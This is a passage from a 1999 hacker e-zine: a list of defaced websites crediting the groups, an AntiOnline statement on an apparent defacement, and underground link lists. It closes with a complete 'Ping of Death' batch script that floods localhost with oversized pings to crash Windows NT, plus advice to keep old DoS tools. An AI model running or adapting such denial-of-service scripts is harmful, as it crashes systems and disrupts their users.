[99.08.03] [sciofide] K Cyber Match Hawaii (mail.cybermatchhawaii.com)
[99.08.03] [KHG] Serbian Links (serbianlinks.homepage.com)
[99.08.03] [Tranzer] Alerion (www.alerion.com)
[99.08.03] [PulseWidth] K Buck (www.buck.com)
[99.08.03] [Saeid Yomtobian] Lost Pussy (www.lostpussy.com)
[99.08.03] [HiP] #2 Mall LA (www.mall-la.com)
[99.08.03] [Tranzer] UPN 35 (www.upn35.com)
[99.08.04] [PulseWidth] DOF CA Gov (www.dof.ca.gov)
[99.08.04] [mozy] Pelican Org (AU)www.pelican.org.au)
[99.08.04] [PulseWidth] Cumberland (www.cumberland.org)
[99.08.04] [KHG] Serbia Online1 (serbiaonline1.cjb.net)
[99.08.04] [Cobra] Stop Nato2 (stopnato2.cjb.net)
[99.08.04] [Pakistan HC] (net88) CAIS (net88.cais.com)
[99.08.04] [neeper] Home Web (www.home-web.com)
[99.08.04] [keebler elves] Teens Land (www.teensland.com)
[99.08.04] [mozy] WEVU TV (www.wevutv.com)
[99.08.05] [ ] AntiOnline Security Site (www.antionline.com)
[99.08.05] So [kl0wn krew] Abatelli (abatelli.com)
[99.08.05] So [SQ] Energia GOB (MX) (atomo.energia.gob.mx)
[99.08.05] So [ ] (code02) PBTech (code02.pbtech.net)
[99.08.05] Li [holo] Tuo BME (HU) (minek.tuo.bme.hu)
[99.08.05] Fb [doofoo] Nailed (nailed.com)
[99.08.05] NT [CUM] Adl Net (www.adlnet.org)
[99.08.05] NT [CUM] #2 Alloweb (www.alloweb.com)
[99.08.05] NT [CUM] Become Net (www.become.net)
[99.08.05] NT [mozy] Amazone (www.amazone.com)
[99.08.05] NT [ ] Comsoft (www.comsoft.com)
[99.08.05] Sc [tvc] Web Banners (www.webbanners.com)
[99.08.06] So [LevelSeven] Poulan Weedeater (www.weedeater.com)
[99.08.06] So [LevelSeven] Tytan Industries (www.tytan.com)
[99.08.06] NT [mozy] Stadskanaal (www.stadskanaal.nu)
[99.08.06] NT [v00d00] Meadowood Retirement Community
(www.retiretoiu.com)
[99.08.06] So [HiP] NorthStarNet (www.northstarnet.org)
[99.08.06] So [LevelSeven] Santa's Official Page (www.north-pole.net)
[99.08.06] So [LevelSeven] News Tips (www.newstips.com)
[99.08.06] So [LevelSeven] Multiverse (www.multiverse.com)
[99.08.06] NT [Citadel] Los Angeles City Site (www.la.com)
[99.08.06] So [LevelSeven] 92.3 Cleveland's Jammin Oldies
(www.jammin.com)
[99.08.06] Ir [kl0wn krew] Illinois Institute of Technology
(www.iit.edu)
[99.08.06] NT [Xessor] Garth Brooks' Official site
(www.garthbrooks.com)
[99.08.06] So [LevelSeven] Best Supply (www.bestsupply.com)
Hacked: http://www.prowrestling.com
By: gH
Mirror: http://www.attrition.org/mirror/attrition/com/www.prowrestling.com/
Hacked: http://www.idhl.gov.my (second time)
By: Hi-Tech Hate
Mirror: http://www.attrition.org/mirror/attrition/misc/www.idhl.gov.my-2
The following site appears to have been defaced. Mirror to come....
HACKED(?): http://www.antionline.com/eye
By: Unknown
Exploit Used: Appears to be a redirect or meta-tag redirect.
This has not been confirmed although we have witnessed this for ourselves.
Details to follow.
AntiOnline Hacked?
Thursday, August 5, 1999 at 13:43:28
by John Vranesevich - Founder of AntiOnline
Following its policy about full site disclosure, AntiOnline offers the
following statement:
AntiOnline's newest feature, "Eye On The Underground", gathers data
from several well known underground websites. The data is gathered
dynamically once an hour via "AntiEye", one of our custom
info-gathering applications.
Today, one of the sites that we gather data from, Bikkel.com's message
board, changed the format of their content to feed our website
information other than that which was intended to be viewed from their
actual webboard.
Although this change in format in no way compromised the integrity of
our servers, or the data contained therein, it did cause alternate
information to be displayed on the "Eye On The Underground" section of
our website to users who had specific versions of the Netscape and IE
webbrowsers. We apologize to our users for the temporary disruption of
this service.
AntiOnline receives a hack attempt an average of once every 2 minutes,
no one has ever successfully infiltrated any of our systems, or the data
contained on them.
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
** FREE TOY INSIDE! ***
This is an old and (should be) dead issue with Windows 95 boxen. The Ping Of Death (PoD) was
quite rampant, and created havoc on irc and elsewhere in its day, you can test your box for
PoD vulnerability by using the following batchfile. Note that results do not always occur
immediately, but sometimes occur several minutes after the 'attack'.... included for the hell
of it, I was bored, the file was just there so wtf? you know? kinda like trying an old exploit
you KNOW is gonna be patched but wanna try it anyway? sometimes with newer versions of software
old bugs are reintroduced so don't throw away all your old DoS programs or exploits, check your
systems regularily.... - DrunkPhuX
--cut--
@echo off
cls
echo ------------------------------------------------------------------------------
echo IMPORTANT INFO:
echo.
echo This Ping of Death works best if you try to surf the Internet
echo at the same time. Now I will try to start the web browser for
echo you right now. If it does not start, please start one right now.
echo.
echo More info at http://www.sophist.demon.co.uk/ping/
echo Author of this batch file can be reached at [ag115@freenet.carleton.ca]
echo.
echo This crashes the author's NT 4.0 Service Pack 1 system reliably
echo and one other system. A third system didn't work, though.
echo THIS SCRIPT PROBABLY DOES NOT CRASH SYSTEMS OTHER THAN THE ONE THIS RUNS ON!
echo.
echo Please flush your disk cache first to be on the safe side.
echo This is done by hitting Ctrl-Alt-Delete once then hiting Esc to return.
echo ------------------------------------------------------------------------------
echo.
echo Attempting to launch Web Browser, please wait...
start /high http://www.microsoft.com/
echo When a web browser is up, press any key to start Ping of Death on localhost.
pause
cls
echo ------------------------------------------------------------------------------
echo Now Initiating Ping of Death flood to localhost!
echo ------------------------------------------------------------------------------
echo.
echo This may take a few minutes, especially if you only have 16 or 32 MB.
echo Please wait until the prompt returns before you try to surf.
echo Forking Ping of Death processes...
REM Seems to work best with taskman loaded, for some weird reason.
start /high /min taskmgr.exe
for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 1000 localhost
cls
echo ------------------------------------------------------------------------------
echo READY TO CRASH WITHIN THE HOUR!
echo.
echo Ping of Death in now in progress...Surf and Die - pun intended. ;-)
echo You should see the blue screen with a STOP error soon.
echo.
echo You may surf now. Remember, it may take 10 mins to crash. Or less. Or more.
echo And not all NT 4.0 systems will crash with this script.
echo You could try launching TaskMgr and a few small apps to expedite the crash.
echo ------------------------------------------------------------------------------
--cut--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]